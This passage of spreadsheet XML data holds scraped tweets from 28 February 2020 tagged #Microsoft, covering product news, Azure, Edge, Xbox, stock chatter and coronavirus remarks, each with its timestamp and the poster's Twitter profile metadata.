https://t.co/gJvBBMdw6K https://t.co/p1RygR0pUQ</t>
  </si>
  <si>
    <t>Fri Feb 28 07:20:46 +0000 2020</t>
  </si>
  <si>
    <t>Instagram PWA With Direct Messaging Now Available on Microsoft Store @tellforceblog https://t.co/phOOlP0UrS #InstagramPWA #PWA #Instagram #Microsoft #Windows10</t>
  </si>
  <si>
    <t>{'id': 167504561, 'id_str': '167504561', 'name': 'TellForce', 'screen_name': 'tellforceblog', 'location': 'Nigeria', 'description': 'Linking You To The Tech World', 'url': 'https://t.co/o7hkWVk9Od', 'entities': {'url': {'urls': [{'url': 'https://t.co/o7hkWVk9Od', 'expanded_url': 'https://www.tellforceblog.com', 'display_url': 'tellforceblog.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1186, 'friends_count': 841, 'listed_count': 7, 'created_at': 'Fri Jul 16 19:21:54 +0000 2010', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9754,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'http://pbs.twimg.com/profile_images/1020000857864179713/JmFgCuL0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1020000857864179713/JmFgCuL0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/167504561/1506694231', 'profile_link_color': '653737',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</si>
  <si>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07:16:13 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/rENP0eH0ra</t>
  </si>
  <si>
    <t>Fri Feb 28 07:14:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edge Chromium Version https://t.co/9fmWYQhVv5 https://t.co/LVEvtGFWEY</t>
  </si>
  <si>
    <t>{'id': 562647203, 'id_str': '562647203', 'name': 'PhoneWorld', 'screen_name': 'PhoneWorldpk', 'location': 'Pakistan', 'description': '#Pakistan leading #Digital and Print #Media that focuses on the #IT &amp; #Telecom industry, Policy, Regulations, Operators, Distribution and App Development.', 'url': 'https://t.co/9wakXnrsla', 'entities': {'url': {'urls': [{'url': 'https://t.co/9wakXnrsla', 'expanded_url': 'http://www.phoneworld.com.pk', 'display_url': 'phoneworld.com.pk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1780, 'friends_count': 207, 'listed_count': 94, 'created_at': 'Wed Apr 25 06:32:58 +0000 2012', 'favourites_count': 165, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20039, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2E49D1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1090522220798070784/Y_frvMbN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090522220798070784/Y_frvMbN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/562647203/1548835760', 'profile_link_color': 'FA743E',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</si>
  <si>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Feb 28 07:13:01 +0000 2020</t>
  </si>
  <si>
    <t>#Indonesia has 2,193 startups, President #Jokowi: that isn't enough.
At the event held in the country's capital #Jakarta, #Microsoft celebrates its 25 years of enabling Indonesias digital economy.
https://t.co/c67JYgvN29 https://t.co/Tw7EIEfEW8</t>
  </si>
  <si>
    <t>{'id': 1158242959092883456, 'id_str': '1158242959092883456', 'name': 'Eyerys', 'screen_name': 'eyeryscompany', 'location': 'Indonesia', 'description': 'Documenting the internet culture, and those that come with it.', 'url': 'https://t.co/N5UxB2h1Bt', 'entities': {'url': {'urls': [{'url': 'https://t.co/N5UxB2h1Bt', 'expanded_url': 'https://www.Eyerys.com', 'display_url': 'Eyerys.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 473, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Mon Aug 05 05:06:55 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 53, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1158243065863139328/HkUhnSY4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158243065863139328/HkUhnSY4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1158242959092883456/1564994645',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</si>
  <si>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07:12:36 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT https://t.co/ZTIcvYqTx7 Pot. cont. Downtrend INTRAWEEK 60m-15m-4m combo chart #Microsoft #Stocks https://t.co/kmOxRJJv8L</t>
  </si>
  <si>
    <t>Fri Feb 28 07:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft support for Windows 7 is over. Are you using Windows 7? Find out what action you should take: https://t.co/RjjSVE0607 #microsoft #windows https://t.co/GHb4xcuIS0</t>
  </si>
  <si>
    <t>{'id': 632801843, 'id_str': '632801843', 'name': 'EMH Technology Ltd', 'screen_name': 'EMHTechnology', 'location': 'Hitchin, England', 'description': 'Comprehensive IT Solutions For Your Business', 'url': 'http://t.co/qy2DjRoy6Z', 'entities': {'url': {'urls': [{'url': 'http://t.co/qy2DjRoy6Z', 'expanded_url': 'http://www.emhtechnology.com', 'display_url': 'emhtechnology.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 133, 'friends_count': 151, 'listed_count': 5, 'created_at': 'Wed Jul 11 11:05:47 +0000 2012', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 999,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'http://pbs.twimg.com/profile_images/1210877402357915648/AC6GwbU1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210877402357915648/AC6GwbU1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/632801843/1438676307',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</si>
  <si>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07:09:08 +0000 2020</t>
  </si>
  <si>
    <t>Az Update: New PowerBI Dashboards for Azure Cost Management and Azure Files with AD https://t.co/QHVN4vgANG #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 07:09:00 +0000 2020</t>
  </si>
  <si>
    <t>Major tech giants (#Microsoft, #Google) already start decoupling of production supply-chains from China due to #coronavirus. Will the virus lead to even more protectionism?
https://t.co/xj5eduVADb
#supplychain #riskmanagement #covid19 #sarscov2</t>
  </si>
  <si>
    <t>{'id': 37916249, 'id_str': '37916249', 'name': 'Dr Michael GlÃ¼ck', 'screen_name': 'drmglueck', 'location': 'Dubai, United Arab Emirates', 'description': 'Head Industries @ #SAP, ex-#Mckinsey, ex-#Cisco | Dr. Business Admin | Digital &amp; Disruption | Family man | Tech Geek | Super-Heros &amp; Reenactment | Tweets my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 449, 'listed_count': 68, 'created_at': 'Tue May 05 12:50:24 +0000 2009', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 596,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'http://pbs.twimg.com/profile_images/793169485029056512/f7_mxXgg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793169485029056512/f7_mxXgg_normal.jpg',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</si>
  <si>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07:04:43 +0000 2020</t>
  </si>
  <si>
    <t>#Google Earth maintenant disponible sur #Firefox, #Microsoft Edge et Opera  https://t.co/oMzGXv4qhg https://t.co/XnyEy3yXmq</t>
  </si>
  <si>
    <t>{'id': 753569222, 'id_str': '753569222', 'name': 'KultureGeek.fr | Actu High-Tech et GeekðŸ“±ðŸ’»ðŸŽ®', 'screen_name': 'KultureGeekFr', 'location': 'Dans la Matrice', 'description': 'Toute lâ€™actu #HighTech et #Geek : smartphones, Internet, science, geekeries, films, promos,â€¦ â€”Nos apps : \uf8ff https://t.co/JvpRYmiGHK ðŸ¤–https://t.co/9W7s0pfQ4G', 'url': 'https://t.co/hb4NTANksP', 'entities': {'url': {'urls': [{'url': 'https://t.co/hb4NTANksP', 'expanded_url': 'https://KultureGeek.fr', 'display_url': 'KultureGeek.fr', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JvpRYmiGHK', 'expanded_url': 'http://kgeek.co/kg_ios', 'display_url': 'kgeek.co/kg_ios', 'indices': [107, 130]}, {'url': 'https://t.co/9W7s0pfQ4G', 'expanded_url': 'http://kgeek.co/kg_android', 'display_url': 'kgeek.co/kg_android', 'indices': [132, 155]}]}}, 'protected': False, 'followers_count': 22152, 'friends_count': 38, 'listed_count': 290, 'created_at': 'Sun Aug 12 18:33:36 +0000 2012', 'favourites_count': 111, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 32705, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DF6610', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2527445284/17b2m0fs8vpd3cr5w4yc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2527445284/17b2m0fs8vpd3cr5w4yc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/753569222/1398202083', 'profile_link_color': '0083B4',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</si>
  <si>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07:01:49 +0000 2020</t>
  </si>
  <si>
    <t>"Be patient and be ready." Is your organization ready for their digital transformation? @RealMadrid is. #Microsoft #Azure #Analytics https://t.co/RZXSthrMy5</t>
  </si>
  <si>
    <t>Fri Feb 28 07:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Never wonder if you've been hacked; #Microsoft Advanced Threat Analytics can detect attacks as they occur and stop them before they cause damage, giving you peace of mind. Learn more about Microsoft's security capabilities in this graphic. https://t.co/dDxnT2qDvz</t>
  </si>
  <si>
    <t>Fri Feb 28 07:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - TENSORFLOW 2.0 PRACTICAL ADVANCED #udemycoupon -&amp;gt; https://t.co/BrI1vSjFOX
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Fri Feb 28 07:00:16 +0000 2020</t>
  </si>
  <si>
    <t>A research tried to quantify how often false activations happen and what the devices hear when they do
#Amazon #AmazonEcho #Apple #AppleHomePod #Google #GoogleHome #Microsoft #SmartSpeakers
https://t.co/Pua4BMDtwA https://t.co/i238I1FB2g</t>
  </si>
  <si>
    <t>{'id': 1080768984058859520, 'id_str': '1080768984058859520', 'name': 'Andrea Fortuna', 'screen_name': 'andreafortunatw', 'location': 'Milan, Lombardy', 'description': 'Cybersecurity expert, software developer, experienced digital forensic analyst, musician #cybersecurity #dfir #music #programming', 'url': 'https://t.co/CVlPp3dgRS', 'entities': {'url': {'urls': [{'url': 'https://t.co/CVlPp3dgRS', 'expanded_url': 'https://www.andreafortuna.org', 'display_url': 'andreafortuna.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 299, 'friends_count': 520, 'listed_count': 4, 'created_at': 'Thu Jan 03 10:13:00 +0000 2019', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 456,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'http://pbs.twimg.com/profile_images/1218983416999424000/Rq7IoYi8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218983416999424000/Rq7IoYi8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1080768984058859520/1579463357',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</si>
  <si>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06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Leverage #Azure premium file shares for high availability of data
https://t.co/7PFuuUNJwA
#tsql #sqldba #SQLServer #VM #HA #microsoft #madeiradata https://t.co/FXU3MSkPaM</t>
  </si>
  <si>
    <t>Fri Feb 28 06:57:53 +0000 2020</t>
  </si>
  <si>
    <t>All you need to know about Azure generation 2 VMS
#Microsoft #Azure #IaaS #VM #AzOps #AzureFamily #Cloud  https://t.co/iIM6aMa2YY</t>
  </si>
  <si>
    <t>Fri Feb 28 06:54:16 +0000 2020</t>
  </si>
  <si>
    <t>100% OFF
Learn Microsoft PowerApps #microsoft #powerapps
https://t.co/NNBEdb5BCH</t>
  </si>
  <si>
    <t>Fri Feb 28 06:43:03 +0000 2020</t>
  </si>
  <si>
    <t>First Look: Microsoft Edge built on Chromium #edge #chromium #microsoft #microsoftedge #chromium-powered https://t.co/8mPCMFt03Z</t>
  </si>
  <si>
    <t>Fri Feb 28 06:38:33 +0000 2020</t>
  </si>
  <si>
    <t>China wants the World to FORGET coronavirus?
Imagine that....
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/JzWdNP8zr0</t>
  </si>
  <si>
    <t>Fri Feb 28 06:38:23 +0000 2020</t>
  </si>
  <si>
    <t>AWS partners with Kenyas Safaricom on cloud and consulting services https://t.co/rTIXVImv7j #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 06:37:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft keen to invest in data center in #Indonesia: #Jokowi. @antara #USINDODailyNews https://t.co/It4XIuExiZ</t>
  </si>
  <si>
    <t>{'id': 74493451, 'id_str': '74493451', 'name': 'USINDO', 'screen_name': 'USINDO', 'location': 'Washington, DC', 'description': 'Expands mutual understanding in the areas of politics, economics, history, culture, and strengthens the bilateral relationship between the U.S. and Indonesia.', 'url': 'http://t.co/izlYl4dsFp', 'entities': {'url': {'urls': [{'url': 'http://t.co/izlYl4dsFp', 'expanded_url': 'http://www.usindo.org', 'display_url': 'usindo.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1517, 'friends_count': 718, 'listed_count': 61, 'created_at': 'Tue Sep 15 16:52:44 +0000 2009', 'favourites_count': 303, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12437, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '01386A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/914058640109191168/tzyNnNS4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/914058640109191168/tzyNnNS4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/74493451/1563531130', 'profile_link_color': '015A9C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FF5E5E', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 06:34:40 +0000 2020</t>
  </si>
  <si>
    <t>Android SwiftKey Keyboard updated with redesigned Settings and Dark Mode https://t.co/OjYy9Htepf #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 06:22:22 +0000 2020</t>
  </si>
  <si>
    <t>#Cloud updates for February 27, 2020
https://t.co/JQSbjgGwlN
#GCP #AWS #Azure #OracleCloudInfrastructure #OCI #GoogleCloudPlatform #AmazonWebServices #Microsoft #IaaS #Datacenter #SiliconSlopes #Analytics #Storage #Networking #AI #ML #MachineLearning #ArtificialIntelligence https://t.co/oSFnrM1Nzh</t>
  </si>
  <si>
    <t>Fri Feb 28 06:20:01 +0000 2020</t>
  </si>
  <si>
    <t>Az Update: New PowerBI Dashboards for #AzureCostManagement and #AzureFiles with #AD https://t.co/eyfl7RELcP #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 06:15:30 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire; with continued investment to role-based certifications
#microsoft #training #azure #certifications https://t.co/IfNknKf7C5</t>
  </si>
  <si>
    <t>Fri Feb 28 06:14:04 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews Death toll from China?  Too many to count.
#DailyWorldBriefing #CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/LwgPz21z2g</t>
  </si>
  <si>
    <t>Fri Feb 28 06:12:20 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting Office Cloud Policy Service (OCPS) #Microsoft  https://t.co/xGFkVralr7</t>
  </si>
  <si>
    <t>Fri Feb 28 06:10:34 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews China rolls out policies on Coronavirus:  Just Stay Home.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/Wanl5QTphO</t>
  </si>
  <si>
    <t>Fri Feb 28 06:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Key Reasons Behind the Omnipresent Dominance of Microsoft Stack for Enterprise Projects https://t.co/J7O0PtMDdW #softwaredevelopment #technologies #Microsoft #SQLServer #dotnet #programming #webdevelopment #VisualStudio #SQL  #Technology
#framework</t>
  </si>
  <si>
    <t>{'id': 2988563016, 'id_str': '2988563016', 'name': 'CMARIX TechnoLabs', 'screen_name': 'CMARIXTechLabs', 'location': 'Ahmedabad, Gujarat, India', 'description': 'CMARIX is a leading technology #outsourcing company in India with expertise in #MobileAppdevelopment, custom #software &amp; Websites. We make outsourcing simple!', 'url': 'http://t.co/M9e65W9uwe', 'entities': {'url': {'urls': [{'url': 'http://t.co/M9e65W9uwe', 'expanded_url': 'http://www.cmarix.com', 'display_url': 'cmarix.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6819, 'friends_count': 7287, 'listed_count': 482, 'created_at': 'Sun Jan 18 13:54:05 +0000 2015', 'favourites_count': 741, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7772,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'http://pbs.twimg.com/profile_images/556812033232863233/Gf562b7I_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/556812033232863233/Gf562b7I_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2988563016/1582537090', 'profile_link_color': 'D14D27',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</si>
  <si>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06:08:36 +0000 2020</t>
  </si>
  <si>
    <t>GitHub Project Provides 300-Plus Samples of https://t.co/cdc1n0ssun Core/Blazor Fundamentals -- Visual Studio Magazine https://t.co/UEKcNJvWUI #dotnet #dotnetcore #microsoft</t>
  </si>
  <si>
    <t>{'id': 507088067, 'id_str': '507088067', 'name': 'Ottorino Bruni', 'screen_name': 'ottorinobruni', 'location': 'Munich', 'description': 'Senior Software Engineer | Microsoft Certified Solutions Developer (MCSD)', 'url': 'https://t.co/k75hO4iviJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/k75hO4iviJ', 'expanded_url': 'https://www.ottorinobruni.com', 'display_url': 'ottorinobruni.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 494, 'friends_count': 1703, 'listed_count': 85, 'created_at': 'Tue Feb 28 08:29:39 +0000 2012', 'favourites_count': 370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2214, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/542975348548567040/ynICuY6L_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/542975348548567040/ynICuY6L_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/507088067/1527191597', 'profile_link_color': '9266CC',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</si>
  <si>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06:06:28 +0000 2020</t>
  </si>
  <si>
    <t>Every time #Microsoft changes the Xbox one dash they fuck it just that little bit more. It's like they intentionally go out of their way to make it worse.</t>
  </si>
  <si>
    <t>{'id': 280895232, 'id_str': '280895232', 'name': 'Kel Today', 'screen_name': 'shadowofajoke', 'location': 'Virgo Supercluster of galaxies', 'description': 'Actor, comedian, writer, teacher', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 659, 'friends_count': 1533, 'listed_count': 9, 'created_at': 'Tue Apr 12 07:05:56 +0000 2011', 'favourites_count': 8053, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6685,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'http://pbs.twimg.com/profile_images/505307884465311744/8P1cdhsP_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/505307884465311744/8P1cdhsP_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/280895232/1408681184',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</si>
  <si>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Feb 28 06:04:55 +0000 2020</t>
  </si>
  <si>
    <t>This is a big announcement for #hyperscale #cloud industry. #Microsoft to invest $1.1bn in #Mexico digital transformation including its first data centre region. #Azure https://t.co/Nc25FyRH3g</t>
  </si>
  <si>
    <t>{'id': 173425336, 'id_str': '173425336', 'name': 'Mike Grella', 'screen_name': 'MikeGrella', 'location': 'NY, SF, LV, CHI, ATL, SEA, DET', 'description': 'Founder disrupting â€œold consultingâ€ w/RT analytics x CSR x diversity. Advise F500, Govs. &amp; Funds. Fmr. Amazon Corporate Affairs, Economic Development Exec.', 'url': 'https://t.co/BsoHbhzZQ9', 'entities': {'url': {'urls': [{'url': 'https://t.co/BsoHbhzZQ9', 'expanded_url': 'https://www.grellapartnershipstrategies.com', 'display_url': 'grellapartnershipstrategies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1841, 'friends_count': 467, 'listed_count': 30, 'created_at': 'Sun Aug 01 12:46:53 +0000 2010', 'favourites_count': 2203, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1306,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'http://pbs.twimg.com/profile_images/1129392895633625089/1X0puiUl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129392895633625089/1X0puiUl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173425336/1579403026',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</si>
  <si>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06:02:34 +0000 2020</t>
  </si>
  <si>
    <t>Got an automated security pull request related to a security vulnerability in a dependency in @github today. 
This made me feel really comfortable. Hats off to the business decisions made to make this true. 
#github #microsoft</t>
  </si>
  <si>
    <t>{'id': 2394016302, 'id_str': '2394016302', 'name': 'minhaz âœ¨', 'screen_name': 'minhazav', 'location': 'Singapore', 'description': 'Software engineer @Google, Ex @Microsoft\nhttps://t.co/7PHr1RwvfX', 'url': 'https://t.co/qMh243g8Xe', 'entities': {'url': {'urls': [{'url': 'https://t.co/qMh243g8Xe', 'expanded_url': 'http://minhazav.dev', 'display_url': 'minhazav.dev', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/7PHr1RwvfX', 'expanded_url': 'http://blog.minhazav.dev', 'display_url': 'blog.minhazav.dev', 'indices': [41, 64]}]}}, 'protected': False, 'followers_count': 177, 'friends_count': 253, 'listed_count': 15, 'created_at': 'Mon Mar 17 08:22:56 +0000 2014', 'favourites_count': 1746, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 510,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'http://pbs.twimg.com/profile_images/1227231000318472192/unvr_-Yw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227231000318472192/unvr_-Yw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2394016302/1581429737', 'profile_link_color': '7FDBB6',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</si>
  <si>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Feb 28 06:00:13 +0000 2020</t>
  </si>
  <si>
    <t>Azure and OpenCV partner on Deep Learning with PyTorch course
https://t.co/6BKbqBnHPA 
#Microsoft #azure #deeplearining #data #course #register #community #ai #issquared #elearning https://t.co/e8VfAxQ2tp</t>
  </si>
  <si>
    <t>Fri Feb 28 06:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Managed 4G/5G service connects to Amazon Microsoft clouds
https://t.co/M71nyjYyv9 
#Microsoft #amazon #cloud #clouds #broadband #internet #azure  #wireless #telecom  #issquared https://t.co/DjuHhKYWjB</t>
  </si>
  <si>
    <t>Year of the Nurse &amp;amp; Midwife Episode 1
https://t.co/eKqlzmc7zC 
#WHO#workforce #healthcare #technology #Educate #Microsoft #organizations #issquared</t>
  </si>
  <si>
    <t>Azure AD for Small Businesses
https://t.co/BHJIzulK4t 
#Microsoft #technology #azure #activedirectory #azuread #cloud #cloudsecurity #Authentication #itinfrastructure #issquared https://t.co/80WgzgWHDn</t>
  </si>
  <si>
    <t>Building the totally Network isolated Root Certification Authority https://t.co/1xQFXjgtx9 
#Microsoft #windows #security #itinfrastructure #wireless #network #cloud #technology #issquared #recommendations</t>
  </si>
  <si>
    <t>Fri Feb 28 06:00:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Preps for RSA Conference with Multiple Security Product Announcements 
https://t.co/jzTMDogKwE 
#Microsoft #conference #rsa #security #product #enterprise #cloud #clouds #cybersecurity #issquared https://t.co/5k4lPHBrAh</t>
  </si>
  <si>
    <t>Fri Feb 28 06:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Join #TDWI, #Microsoft and #Qlik on this 11 March webinar to help you define 2020 and Beyond: Architecting Your Data Warehouse for the New Decade. #azure #attunity #datastreaming #datawarehouse #dataintegration https://t.co/4BYreCaUuD</t>
  </si>
  <si>
    <t>{'id': 2177768371, 'id_str': '2177768371', 'name': 'caroline long', 'screen_name': 'caroline_clong', 'location': 'London', 'description': 'EMEA Marketing Director. Specialist in Digital Marketing. Views expressed are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 1107, 'listed_count': 45, 'created_at': 'Wed Nov 06 09:53:07 +0000 2013', 'favourites_count': 1130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1798,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'http://pbs.twimg.com/profile_images/1041788522108264450/fdtN_7qH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041788522108264450/fdtN_7qH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2177768371/1537216753',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</si>
  <si>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06:00:04 +0000 2020</t>
  </si>
  <si>
    <t>"Its important to have a team of people with a #diverse background to reduce #bias in #AI models " #Microsoft #India @satyanadella https://t.co/n7xIXYunY7 #MSFTAdvocate</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign #Vaticanpledge for #ethicalAI #appsmgt #AI
https://t.co/1sviygpfvF https://t.co/gEx3ESToTA</t>
  </si>
  <si>
    <t>Fri Feb 28 06:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Issues Financial Warning Because of Coronavirus https://t.co/qw21pYvgJC via @Snapzu #microsoft #tech #coronavirus #technews</t>
  </si>
  <si>
    <t>{'id': 2544589878, 'id_str': '2544589878', 'name': 'Snapzu Tech/Gadgets', 'screen_name': 'Snapzu_Tech', 'location': 'Connect with fellow bloggers: ðŸ‘‡', 'description': 'Official #Technology section of @Snapzu. https://t.co/8FZNjgA8v2! RUN A BLOG? Offer community access &amp; grow your email list 3x faster! https://t.co/vcHcIJGEm0', 'url': 'https://t.co/K0qXno7bVW', 'entities': {'url': {'urls': [{'url': 'https://t.co/K0qXno7bVW', 'expanded_url': 'http://www.snapzu.com/i/teamsnapzu/to/bes', 'display_url': 'snapzu.com/i/teamsnapzu/tâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8FZNjgA8v2', 'expanded_url': 'http://snapzu.com/n/tech', 'display_url': 'snapzu.com/n/tech', 'indices': [41, 64]}, {'url': 'https://t.co/vcHcIJGEm0', 'expanded_url': 'https://goo.gl/vFoJyE', 'display_url': 'goo.gl/vFoJyE', 'indices': [135, 158]}]}}, 'protected': False, 'followers_count': 1703, 'friends_count': 2450, 'listed_count': 183, 'created_at': 'Tue Jun 03 23:23:45 +0000 2014', 'favourites_count': 128230, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31720,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'http://pbs.twimg.com/profile_images/473968524117827584/mEKj3EG-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/473968524117827584/mEKj3EG-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2544589878/1401837860',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</si>
  <si>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05:59:18 +0000 2020</t>
  </si>
  <si>
    <t>Bought MSFT on the dip. Crypto sin?
#Microsoft #bitcoin #crypto #cryptocurrency</t>
  </si>
  <si>
